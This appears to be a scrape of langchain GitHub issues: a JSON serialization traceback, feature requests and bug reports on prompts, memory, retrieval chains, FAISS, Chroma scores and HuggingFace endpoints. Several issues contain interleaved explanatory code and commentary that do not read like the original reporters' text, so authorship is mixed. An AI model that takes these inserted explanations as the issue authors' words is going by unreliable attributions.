551 data = params
552 if params and not files:
--> 553 data = json.dumps(params).encode()
554 headers["Content-Type"] = "application/json"
555 else:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/__init__.py:231, in dumps(obj, skipkeys, ensure_ascii, check_circular, allow_nan, cls, indent, separators, default, sort_keys, **kw)
226 # cached encoder
227 if (not skipkeys and ensure_ascii and
228 check_circular and allow_nan and
229 cls is None and indent is None and separators is None and
230 default is None and not sort_keys and not kw):
--> 231 return _default_encoder.encode(obj)
232 if cls is None:
233 cls = JSONEncoder
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:199, in JSONEncoder.encode(self, o)
195 return encode_basestring(o)
196 # This doesn't pass the iterator directly to ''.join() because the
197 # exceptions aren't as detailed. The list call should be roughly
198 # equivalent to the PySequence_Fast that ''.join() would do.
--> 199 chunks = self.iterencode(o, _one_shot=True)
200 if not isinstance(chunks, (list, tuple)):
201 chunks = list(chunks)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:257, in JSONEncoder.iterencode(self, o, _one_shot)
252 else:
253 _iterencode = _make_iterencode(
254 markers, self.default, _encoder, self.indent, floatstr,
255 self.key_separator, self.item_separator, self.sort_keys,
256 self.skipkeys, _one_shot)
--> 257 return _iterencode(o, 0)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:179, in JSONEncoder.default(self, o)
160 def default(self, o):
161 """Implement this method in a subclass such that it returns
162 a serializable object for ``o``, or calls the base implementation
163 (to raise a ``TypeError``).
(...)
177
178 """
--> 179 raise TypeError(f'Object of type {o.__class__.__name__} '
180 f'is not JSON serializable')
TypeError: Object of type PromptTemplate is not JSON serializable
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.prompts import PromptTemplate
prompt_template = """Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.
Question: {question}
Answer in Italian:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["question"]
)
chain_type_kwargs = {"prompt": PROMPT}
llm = ChatOpenAI(model_name = "gpt-3.5-turbo",temperature=0,model_kwargs=chain_type_kwargs)
qa_chain = load_qa_chain(llm=llm, chain_type="stuff",verbose=True)
qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
query = "halo"
qa.run(query)
### Expected behavior
Hope to use the PromptTemplate in QA | TypeError: Object of type PromptTemplate is not JSON serializable | https://api.github.com/repos/langchain-ai/langchain/issues/7426/comments | 2 | 2023-07-09T10:02:36Z | 2023-10-15T16:04:53Z | https://github.com/langchain-ai/langchain/issues/7426 | 1,795,324,312 | 7,426 |
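The root cause in the report above: `chain_type_kwargs` (containing the `PromptTemplate`) was passed as `model_kwargs` to `ChatOpenAI`, and model kwargs are serialized straight into the OpenAI API request body with `json.dumps`. A stdlib-only sketch of why that fails; the class below is a stand-in, not langchain's actual `PromptTemplate`. The usual fix (an assumption to check against your langchain version) is to pass the prompt to the chain instead, e.g. `load_qa_chain(llm, chain_type="stuff", prompt=PROMPT)`:

```python
import json

class PromptTemplate:
    # Stand-in for langchain's PromptTemplate: a plain Python object,
    # which the OpenAI client's json.dumps() cannot serialize.
    def __init__(self, template: str):
        self.template = template

# This mirrors what happens when the template ends up in model_kwargs.
params = {"model": "gpt-3.5-turbo", "prompt": PromptTemplate("Answer: {question}")}
error_message = ""
try:
    json.dumps(params)
except TypeError as exc:
    error_message = str(exc)
print(error_message)  # Object of type PromptTemplate is not JSON serializable
```

Anything placed in `model_kwargs` must be JSON-serializable, because it is forwarded verbatim to the API.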
[
"langchain-ai",
"langchain"
] | ### Feature request
We are using langchain for non-English applications. The prefix for system messages is hardcoded as "System":
```python
for m in messages:
if isinstance(m, HumanMessage):
role = human_prefix
elif isinstance(m, AIMessage):
role = ai_prefix
elif isinstance(m, SystemMessage):
role = "System"
elif isinstance(m, FunctionMessage):
role = "Function"
elif isinstance(m, ChatMessage):
role = m.role
else:
raise ValueError(f"Got unsupported message type: {m}")
```
The word "System" will appear in the prompt, e.g., when using summary-based memories. A sudden English word is not friendly to non-English LLMs.
### Motivation
Improving multi-language support.
### Your contribution
Sorry. I am probably not capable enough of developing langchain. | Can you make system_prefix customizable? | https://api.github.com/repos/langchain-ai/langchain/issues/7415/comments | 1 | 2023-07-08T22:26:17Z | 2023-10-14T20:09:47Z | https://github.com/langchain-ai/langchain/issues/7415 | 1,795,149,831 | 7,415 |
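A sketch of what the requested change could look like: a `get_buffer_string`-style helper where every prefix, including the system one, is a parameter. The message classes below are stand-ins for langchain's real ones:

```python
from dataclasses import dataclass

@dataclass
class HumanMessage:
    content: str

@dataclass
class AIMessage:
    content: str

@dataclass
class SystemMessage:
    content: str

def get_buffer_string(messages, human_prefix="Human", ai_prefix="AI",
                      system_prefix="System"):
    lines = []
    for m in messages:
        if isinstance(m, HumanMessage):
            role = human_prefix
        elif isinstance(m, AIMessage):
            role = ai_prefix
        elif isinstance(m, SystemMessage):
            role = system_prefix  # configurable instead of hardcoded
        else:
            raise ValueError(f"Got unsupported message type: {m}")
        lines.append(f"{role}: {m.content}")
    return "\n".join(lines)

buffer = get_buffer_string(
    [SystemMessage("Du bist ein Assistent"), HumanMessage("Hallo")],
    human_prefix="Mensch", system_prefix="System-Nachricht",
)
print(buffer)
```

The only change relative to the snippet quoted in the request is replacing the literal `"System"` with a `system_prefix` parameter that defaults to the current behavior.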
[
"langchain-ai",
"langchain"
] | ### Feature request
Pipe `intermediate_steps` out of MR chain:
```
# Combining documents by mapping a chain over them, then combining results
combine_documents = MapReduceDocumentsChain(
# Map chain
llm_chain=map_llm_chain,
# Reduce chain
reduce_documents_chain=reduce_documents_chain,
# The variable name in the llm_chain to put the documents in
document_variable_name="questions",
# Return the results of the map steps in the output
return_intermediate_steps=True)
# Define Map=Reduce
map_reduce = MapReduceChain(
# Chain to combine documents
combine_documents_chain=combine_documents,
# Splitter to use for initial split
text_splitter=text_splitter)
return map_reduce.run(input_text=input_doc)
```
Error:
```
ValueError: `run` not supported when there is not exactly one output key. Got ['output_text', 'intermediate_steps'].
```
### Motivation
We want to return the intermediate docs
### Your contribution
Will work on this | Pipe `intermediate_steps` out of map_reduce.run() | https://api.github.com/repos/langchain-ai/langchain/issues/7412/comments | 4 | 2023-07-08T19:14:30Z | 2024-02-09T16:25:54Z | https://github.com/langchain-ai/langchain/issues/7412 | 1,795,070,373 | 7,412 |
[
"langchain-ai",
"langchain"
] | ### System Info
Hey! Below is the code I'm using:
```
llm_name = "gpt-3.5-turbo"
# llm_name = "gpt-4"
os.environ["OPENAI_API_KEY"] = ""
st.set_page_config(layout="wide")
def load_db(file_path, chain_type, k):
loader = PyPDFLoader(file_path)
documents = loader.load()
text_splitter = RecursiveCharacterTextSplitter(chunk_size=2000, chunk_overlap=300)
docs = text_splitter.split_documents(documents)
embeddings = OpenAIEmbeddings()
db = DocArrayInMemorySearch.from_documents(docs, embeddings)
retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": k})
qa = ConversationalRetrievalChain.from_llm(
llm=ChatOpenAI(model_name=llm_name, temperature=1),
chain_type=chain_type,
retriever=retriever,
return_source_documents=False,
return_generated_question=False
)
return qa
```
Even though I'm using the RecursiveCharacterTextSplitter function, it is returning the error below.
`InvalidRequestError: This model's maximum context length is 4097 tokens. However, your messages resulted in 5822 tokens. Please reduce the length of the messages.`
Is there anything which will fix this issue?
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
I'm using the RecursiveCharacterTextSplitter function, so I expected the resulting chunks to keep the prompt within the context length. It should work, right? | InvalidRequestError: This model's maximum context length is 4097 tokens. However, your messages resulted in 5822 tokens. Please reduce the length of the messages. | https://api.github.com/repos/langchain-ai/langchain/issues/7411/comments | 3 | 2023-07-08T19:08:53Z | 2023-11-15T16:07:44Z | https://github.com/langchain-ai/langchain/issues/7411 | 1,795,068,803 | 7,411
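Chunking alone does not bound the prompt: the retriever returns k chunks that are concatenated together with the question and the whole chat history, so `chunk_size=2000` characters times several chunks can easily pass 4,097 tokens. A rough back-of-envelope check, using the common ~4 characters-per-token approximation (an assumption; exact counts need a tokenizer such as tiktoken):

```python
CHARS_PER_TOKEN = 4          # rough heuristic for English text
CONTEXT_LIMIT = 4097         # gpt-3.5-turbo window from the error message

def approx_prompt_tokens(chunk_size: int, k: int, history_chars: int = 0) -> int:
    # Retrieved chunks plus accumulated chat history, converted to tokens.
    return (chunk_size * k + history_chars) // CHARS_PER_TOKEN

# chunk_size=2000 with 4 retrieved chunks and a few long turns of history:
tokens = approx_prompt_tokens(chunk_size=2000, k=4, history_chars=10000)
print(tokens, tokens > CONTEXT_LIMIT)  # 4500 True

# Shrinking chunk_size, k, or the kept history brings it back under:
safer = approx_prompt_tokens(chunk_size=1000, k=3, history_chars=1000)
print(safer, safer < CONTEXT_LIMIT)    # 1000 True
```

So the practical fixes are reducing `chunk_size`, lowering `k` in `search_kwargs`, or trimming the conversation history passed into the chain, not just splitting the documents.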
[
"langchain-ai",
"langchain"
] | ### Feature request
I'm trying to create a Q&A application where I'm using Vicuna, and it's taking a lot of time to return the response. Below is the code:
```
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import DocArrayInMemorySearch
from langchain.chains import ConversationalRetrievalChain
from langchain.chat_models import ChatOpenAI
from langchain.document_loaders import PyPDFLoader
from langchain.embeddings import HuggingFaceEmbeddings
import llama_cpp
from run_localGPT import load_model
def load_db(file, chain_type, k):
# load documents
loader = PyPDFLoader(file)
documents = loader.load()
# split documents
text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=150)
docs = text_splitter.split_documents(documents)
# define embedding
embeddings = HuggingFaceEmbeddings()
# create vector database from data
db = DocArrayInMemorySearch.from_documents(docs, embeddings)
# define retriever
retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": k})
# create a chatbot chain. Memory is managed externally.
qa = ConversationalRetrievalChain.from_llm(
llm=load_model(model_id="TheBloke/Wizard-Vicuna-13B-Uncensored-GGML", device_type="mps", model_basename="Wizard-Vicuna-13B-Uncensored.ggmlv3.q2_K.bin"),#ChatOpenAI(model_name=llm_name, temperature=0),
chain_type=chain_type,
retriever=retriever,
return_source_documents=True,
return_generated_question=True,
)
return qa
```
I'm using the Vicuna-13B model and Hugging Face embeddings. My thought is that response time would improve if I used Hugging Face embeddings with a benchmark Q&A model. Is there any way to load standard models like DistilBERT, RoBERTa, distilbert-base-uncased-distilled-squad, etc.?
### Motivation
To utilize the benchmark models for better response time.
### Your contribution
- | Adding function to utilize normal models like distilbert, roberta etc | https://api.github.com/repos/langchain-ai/langchain/issues/7406/comments | 1 | 2023-07-08T16:21:18Z | 2023-10-14T20:09:52Z | https://github.com/langchain-ai/langchain/issues/7406 | 1,795,005,669 | 7,406 |
[
"langchain-ai",
"langchain"
] | Hi: I'm trying to merge a list of `langchain.vectorstores.FAISS` objects to create a new (merged) vectorstore, but I still need the original (pre-merge) vectorstores intact. I can use `x.merge_from(y)` which works great:
```python
merged_stores = reduce(lambda x, y: (z := x).merge_from(y) or z, stores)
```
but that modifies x in place, so my original list of vectorstores ends up with its first store containing a merge with all other elements of the list: which is not what I want. So I tried using `deepcopy()` to make a temporary copy of the vectorstore I'm merging into:
```python
merged_stores = reduce(lambda x, y: (z := deepcopy(x)).merge_from(y) or z, stores)
```
which does exactly what I want. However, I now find that when I use a Universal Sentence Encoder embedding in the original list of vectorstores I get an exception from `deepcopy()`:
`TypeError: cannot pickle '_thread.RLock' object`
Is there an obvious way for me to achieve this (non-destructive) merge without adding my own `FAISS.merge_from_as_copy()` method to the `langchain.vectorstores.FAISS` class?
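The mutation problem is independent of FAISS, so here is a stdlib sketch with plain lists standing in for vectorstores (`extend` playing the role of `merge_from`); the fix is to fold into a fresh accumulator rather than deep-copying the first element:

```python
from functools import reduce

stores = [[1], [2], [3]]          # stand-ins for FAISS stores; extend ~ merge_from

# In-place fold (the bug): the first store accumulates everything.
mutated = [list(s) for s in stores]
reduce(lambda x, y: (x.extend(y), x)[1], mutated)
print(mutated[0])                 # [1, 2, 3] -- original was mutated

# Non-destructive fold: start from a fresh accumulator instead of deep-copying.
def merge_all(stores):
    acc = []                      # with FAISS: clone a seed store once instead
    for s in stores:
        acc.extend(s)             # acc.merge_from(s)
    return acc

merged = merge_all(stores)
print(merged, stores)             # [1, 2, 3] [[1], [2], [3]]
```

For FAISS specifically, one deepcopy-free way to clone the seed store (an untested suggestion) is `x.save_local(tmp_dir)` followed by `FAISS.load_local(tmp_dir, embeddings)`, which avoids pickling the embedding object entirely.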
| Trying to merge a list of FAISS vectorstores without modifying the original vectorstores, but deepcopy() fails | https://api.github.com/repos/langchain-ai/langchain/issues/7402/comments | 5 | 2023-07-08T14:05:34Z | 2023-10-21T16:07:25Z | https://github.com/langchain-ai/langchain/issues/7402 | 1,794,954,384 | 7,402 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Add the `name` and `arguments` from `function_call` to `on_llm_new_token` when `streaming=True`.
Now it's getting called with an empty token several times and no way to retrieve the `function_call['arguments']`.
We need to add this to every llm/
### Motivation
I'm streaming my calls (user get's to see the output realtime) to an llm and I've decided to use function calls so I get a structured output. I want to show the user the results (one argument is `message`) but I cannot cause only the tokens from `content` are streamed.
Using the plain openai api I can do this.
### Your contribution
I can contribute a PR to a model and some tests, but I need guidance, as what the API should be. As I understand only `chat_models.openai` should be modified. | Add the `name` and `arguments` from `function_call` to `on_llm_new_token` when `streaming=True` | https://api.github.com/repos/langchain-ai/langchain/issues/7385/comments | 6 | 2023-07-07T23:14:25Z | 2023-09-25T09:45:57Z | https://github.com/langchain-ai/langchain/issues/7385 | 1,794,522,874 | 7,385 |
[
"langchain-ai",
"langchain"
] | ### System Info
> langchain==0.0.227
> langchainplus-sdk==0.0.20
> chromadb==0.3.26
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm sorry, but I don't have the time to carve out an MRE right now. My take is that it's still better to report it than not to.
### Expected behavior
`similarity_search_with_score` returns the distance as expected, but `similarity_search_with_relevance_scores` gives the same values, so that the closest distances return the smallest values, even though the output of the latter function is supposed to be higher for vectors that are closer:
> `similarity_search_with_relevance_scores`
> Return docs and relevance scores in the range [0, 1].
> 0 is dissimilar, 1 is most similar. | ChromaDB score goes the wrong way | https://api.github.com/repos/langchain-ai/langchain/issues/7384/comments | 6 | 2023-07-07T23:11:04Z | 2024-02-09T16:25:58Z | https://github.com/langchain-ai/langchain/issues/7384 | 1,794,520,863 | 7,384 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I want to pass arguments to the retriever used in the `VectorStoreIndexWrapper` `query` and `query_with_sources` methods. Right now, those methods don't have any means of passing `VectorStoreRetriever` arguments into `vectorstore.as_retriever()`:
```
langchain/indexes/vectorstore.py
def query(
self, question: str, llm: Optional[BaseLanguageModel] = None, **kwargs: Any
) -> str:
"""Query the vectorstore."""
llm = llm or OpenAI(temperature=0)
chain = RetrievalQA.from_chain_type(
--->llm, retriever=self.vectorstore.as_retriever(), **kwargs
)
return chain.run(question)
def query_with_sources(
self, question: str, llm: Optional[BaseLanguageModel] = None, **kwargs: Any
) -> dict:
"""Query the vectorstore and get back sources."""
llm = llm or OpenAI(temperature=0)
chain = RetrievalQAWithSourcesChain.from_chain_type(
--->llm, retriever=self.vectorstore.as_retriever(), **kwargs
)
return chain({chain.question_key: question})
```
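One possible shape for the change, sketched with minimal mock classes (the `retriever_kwargs` name and the mocks are hypothetical, not the current API):

```python
class MockRetriever:
    def __init__(self, **kwargs):
        self.kwargs = kwargs

class MockVectorStore:
    def as_retriever(self, **kwargs):
        return MockRetriever(**kwargs)

class VectorStoreIndexWrapper:
    def __init__(self, vectorstore):
        self.vectorstore = vectorstore

    def query(self, question, llm=None, retriever_kwargs=None, **kwargs):
        retriever_kwargs = retriever_kwargs or {}
        # the real method would build a RetrievalQA chain from this retriever
        retriever = self.vectorstore.as_retriever(**retriever_kwargs)
        return retriever

wrapper = VectorStoreIndexWrapper(MockVectorStore())
r = wrapper.query("q", retriever_kwargs={"search_type": "mmr", "search_kwargs": {"k": 5}})
print(r.kwargs)  # {'search_type': 'mmr', 'search_kwargs': {'k': 5}}
```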
### Motivation
I can't input `VectorStoreRetriever` arguments such as `search_type` or `search_kwargs` into `VectorStoreIndexWrapper.query()`, but I would be able to do that via `VectorStore.as_retriever()`, which `query()` and `query_with_sources()` use anyway.
### Your contribution
If someone isn't already working on this, I can make this change and submit a PR. | Passing VectorStoreRetriever arguments to VectorStoreIndexWrapper.query() | https://api.github.com/repos/langchain-ai/langchain/issues/7376/comments | 1 | 2023-07-07T20:39:29Z | 2023-10-14T20:09:57Z | https://github.com/langchain-ai/langchain/issues/7376 | 1,794,271,625 | 7,376 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
Below is the code which I'm using for another model:
```
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import DocArrayInMemorySearch
from langchain.chains import ConversationalRetrievalChain
from langchain.chat_models import ChatOpenAI
from langchain.document_loaders import PyPDFLoader
from langchain.embeddings import HuggingFaceEmbeddings
import llama_cpp
# create a chatbot chain. Memory is managed externally.
qa = ConversationalRetrievalChain.from_llm(
llm=load_model(model_id="TheBloke/orca_mini_v2_7B-GGML", device_type="mps", model_basename="orca-mini-v2_7b.ggmlv3.q4_0.bin"),#ChatOpenAI(model_name=llm_name, temperature=0),
chain_type=chain_type,
retriever=retriever,
return_source_documents=True,
return_generated_question=True,
)
```
I'm loading the Orca Mini model with `model_id` and `model_basename`. How do I load the Vicuna-7B, Vicuna-13B, and Falcon LLMs? And how do I change the device type from mps to CUDA?
### Idea or request for content:
_No response_ | How to load Vicuna-7b, Vicuna13-b and Falcon LLM's from langchain through ConversationalRetrievalChain function? | https://api.github.com/repos/langchain-ai/langchain/issues/7374/comments | 0 | 2023-07-07T20:17:44Z | 2023-07-07T20:26:58Z | https://github.com/langchain-ai/langchain/issues/7374 | 1,794,215,961 | 7,374 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
@hwchase17 There's been a reporter from Fortune who are in their words: "launching our A.I. 50 list later this month. LangChain is being considered for the list, and while I've tried to get in touch with Harrison and Ankush in as many ways as possible, I haven't been able to."
They've been trying to get in touch with @hwchase17 for weeks now.
Search for **bdanweiss** on the Discord group.
### Suggestion:
_No response_ | Fortune Reporter trying to get in touch with Chase | https://api.github.com/repos/langchain-ai/langchain/issues/7373/comments | 1 | 2023-07-07T20:07:36Z | 2023-07-10T16:26:16Z | https://github.com/langchain-ai/langchain/issues/7373 | 1,794,191,212 | 7,373 |
[
"langchain-ai",
"langchain"
] | ### System Info
```python
from typing_extensions import Protocol
from langchain.llms import OpenAI

llm = OpenAI(model_name='text-davinci-003', temperature=0.7, max_tokens=512)
print(llm)
```

```
---------------------------------------------------------------------------
ImportError                               Traceback (most recent call last)
<ipython-input-28-c0d04f63c5e1> in <module>
      1 get_ipython().system('pip install typing-extensions==4.3.0')
      2 from typing_extensions import Protocol
----> 3 from langchain.llms import OpenAI
      4 llm = OpenAI(model_name='text-davinci-003', temperature=0.7, max_tokens=512)
      5 print(llm)

~\anaconda3\envs\GPTLLM\lib\site-packages\langchain\__init__.py in <module>
      1 """Main entrypoint into package."""
      2
----> 3 from importlib import metadata
      4 from typing import Optional
      5

~\anaconda3\envs\GPTLLM\lib\importlib\metadata\__init__.py in <module>
     15 import collections
     16
---> 17 from . import _adapters, _meta
     18 from ._collections import FreezableDefaultDict, Pair
     19 from ._functools import method_cache, pass_none

~\anaconda3\envs\GPTLLM\lib\importlib\metadata\_meta.py in <module>
----> 1 from typing import Any, Dict, Iterator, List, Protocol, TypeVar, Union
      2
      3
      4 _T = TypeVar("_T")
      5

ImportError: cannot import name 'Protocol'
```
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.llms import OpenAI

llm = OpenAI(model_name='text-davinci-003', temperature=0.7, max_tokens=512)
print(llm)
```
### Expected behavior
OpenAI
Params:{model_name, temperature, max_tokens} | from langchain.llms import OpenAI causing ImportError: cannot import name 'Protocol' | https://api.github.com/repos/langchain-ai/langchain/issues/7369/comments | 3 | 2023-07-07T18:30:00Z | 2024-06-08T12:37:41Z | https://github.com/langchain-ai/langchain/issues/7369 | 1,794,024,937 | 7,369 |
[
"langchain-ai",
"langchain"
] | I am using conversational retrieval chain with memory, but I am getting incorrect answers for trivial questions.
Any suggestions on what I can do to improve the accuracy of the output?
```python
# memory = ConversationEntityMemory(llm=llm, return_messages=True)
memory = ConversationBufferMemory(memory_key="chat_history", output_key='answer')

chain = ConversationalRetrievalChain.from_llm(
    llm=llm,
    retriever=retriever,
    memory=memory,
    get_chat_history=lambda h: h,
    return_source_documents=True)
```

| conversationalRetrievalChain - how to improve accuracy | https://api.github.com/repos/langchain-ai/langchain/issues/7368/comments | 3 | 2023-07-07T18:26:31Z | 2023-10-16T16:06:15Z | https://github.com/langchain-ai/langchain/issues/7368 | 1,794,019,802 | 7,368 |
[
"langchain-ai",
"langchain"
] | ### Feature request
When using the YouTube loader, I think it would be useful to take the chapters into account, if present.
1. The chapter timecode could be used to know when to chunk. Any chunk inside a chapter timeframe could also contain the same "youtube_chapter_title" metadata.
2. The name of the chapter could be added directly inside the transcript, for example as a markdown header.
### Motivation
There are useful information present in the youtube chapter title and timecodes that could be of use to LLMs.
Summarizing transcripts would probably be of higher quality if headers are present rather than a huge wall of text.
Adding metadata is always a win.
### Your contribution
Unfortunately not able to help for the time being but wanted to get the idea out there. | use youtube chapter as hints and metadata in the youtube loader | https://api.github.com/repos/langchain-ai/langchain/issues/7366/comments | 13 | 2023-07-07T18:19:36Z | 2024-06-15T18:33:35Z | https://github.com/langchain-ai/langchain/issues/7366 | 1,794,008,740 | 7,366 |
[
"langchain-ai",
"langchain"
] | ### System Info
Python 3.10
Langchain 0.0.226
Windows 11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os, langchain
os.environ['SERPAPI_API_KEY'] = ""
os.environ['OPENAI_API_KEY'] = ""
from langchain.chains import LLMChain
from langchain.agents import ConversationalChatAgent, SelfAskWithSearchChain, AgentExecutor
from langchain.memory import ConversationBufferWindowMemory
from langchain.tools import Tool
from langchain.llms import OpenAI
conversation_buffer_window_memory: ConversationBufferWindowMemory = ConversationBufferWindowMemory(
input_key="input", memory_key="chat_history")
search = langchain.SerpAPIChain()
self_ask_and_search = SelfAskWithSearchChain(llm=OpenAI(), search_chain=search, verbose=True)
tools = [
Tool(
name="Search",
func=self_ask_and_search.run,
description="useful for when you need to answer questions about current events",
)
]
prompt = ConversationalChatAgent.create_prompt(
tools, input_variables=["input", "chat_history", "agent_scratchpad"]
)
llm_chain = LLMChain(
llm=OpenAI(temperature=0), prompt=prompt)
agent = ConversationalChatAgent(
llm_chain=llm_chain, tools=tools, verbose=True)
agent_executor = AgentExecutor.from_agent_and_tools(
agent=agent, tools=tools, verbose=True, memory=conversation_buffer_window_memory)
agent_executor.run('what is the capital of texas?')
```
returns the following error:
(<class 'ValueError'>, ValueError('variable chat_history should be a list of base messages, got '), <traceback object at 0x0000027BA6366E40>)
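The error suggests the chat-style prompt received the memory's string-formatted history (which is `""` when empty) instead of a message list. Below is a stand-alone plain-Python sketch of that mismatch — not LangChain code — together with the commonly suggested fix of constructing the memory with `return_messages=True`:

```python
def render_chat_prompt(chat_history):
    # a chat-style prompt template expects a *list* of messages here
    if not isinstance(chat_history, list):
        raise ValueError(
            f"variable chat_history should be a list of base messages, got {chat_history}"
        )
    return chat_history

class BufferMemory:
    def __init__(self, return_messages=False):
        self.return_messages = return_messages
        self.messages = []

    def load(self):
        # string-formatted history vs. the raw message list
        return self.messages if self.return_messages else "\n".join(self.messages)

try:
    render_chat_prompt(BufferMemory().load())          # -> ValueError, as in the issue
except ValueError as e:
    print(e)

print(render_chat_prompt(BufferMemory(return_messages=True).load()))  # []
```

Applied to the repro, that would mean `ConversationBufferWindowMemory(input_key="input", memory_key="chat_history", return_messages=True)` — untested here, but consistent with the error message.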
### Expected behavior
Return the LLM result while updating the memory mechanism. | ConversationBufferWindowMemory returns empty string on empty history instead of empty array. | https://api.github.com/repos/langchain-ai/langchain/issues/7365/comments | 7 | 2023-07-07T17:56:12Z | 2023-12-05T12:07:46Z | https://github.com/langchain-ai/langchain/issues/7365 | 1,793,960,528 | 7,365 |
[
"langchain-ai",
"langchain"
] | ### System Info
The provided class
[langchain/langchain/llms/huggingface_endpoint.py](https://github.com/hwchase17/langchain/blob/370becdfc2dea35eab6b56244872001116d24f0b/langchain/llms/huggingface_endpoint.py)
`class HuggingFaceEndpoint(LLM)`
has a bug.
It should be
```python
if self.task == "text-generation":
    # Text generation return includes the starter text.
    text = generated_text[0]["generated_text"]
```
not
```python
text = generated_text[0]["generated_text"][len(prompt) :]
```
the current class will likely just return a 0.
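A self-contained demonstration of why the slice misbehaves when the endpoint returns only the completion (no prompt echo):

```python
# Text-generation endpoints that do *not* echo the prompt return only the
# completion, so dropping len(prompt) characters removes (most of) the answer.

prompt = "Translate to French: hello"
generated_text = [{"generated_text": "bonjour"}]   # completion only, no echo

sliced = generated_text[0]["generated_text"][len(prompt):]
full = generated_text[0]["generated_text"]

print(repr(sliced))  # '' -- everything was cut off
print(repr(full))    # 'bonjour'
```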
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
llm= HuggingFaceEndpoint(endpoint_url=os.getenv('ENDPOINT_URL'),task="text-generation",
model_kwargs={"temperature":0.7, "max_length":512})
conversation_chain = ConversationalRetrievalChain.from_llm(
llm=llm,
retriever=vectorstore.as_retriever(),
memory=memory
)
```
### Expected behavior
the output is 0 | HuggingFaceEndpoint Class Bug | https://api.github.com/repos/langchain-ai/langchain/issues/7353/comments | 1 | 2023-07-07T14:49:27Z | 2023-07-11T07:06:07Z | https://github.com/langchain-ai/langchain/issues/7353 | 1,793,680,431 | 7,353 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain Version - 0.0.201
Platform - Windows 11
Python - 3.10.11
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. load some text documents to a vector store, i used deeplake
2. load the db
3. call the function, summarizer(db,"Summarize the mentions of google according to their AI program")(defined in attached file)
4. run for chain_type as stuff, it will work, for map_reduce it will fail in retrieval QA Bot
[main.zip](https://github.com/hwchase17/langchain/files/11982265/main.zip)
### Expected behavior
it should work for all the chain types and give results | map_reduce and refine not working with RetrievalQA chain | https://api.github.com/repos/langchain-ai/langchain/issues/7347/comments | 9 | 2023-07-07T13:09:59Z | 2023-11-14T16:08:01Z | https://github.com/langchain-ai/langchain/issues/7347 | 1,793,525,647 | 7,347 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Python environment:
- neo4j 5.0.0
- neobolt 1.7.17

Neo4j version: neo4j-35-apoc:v20220808

Error:
```
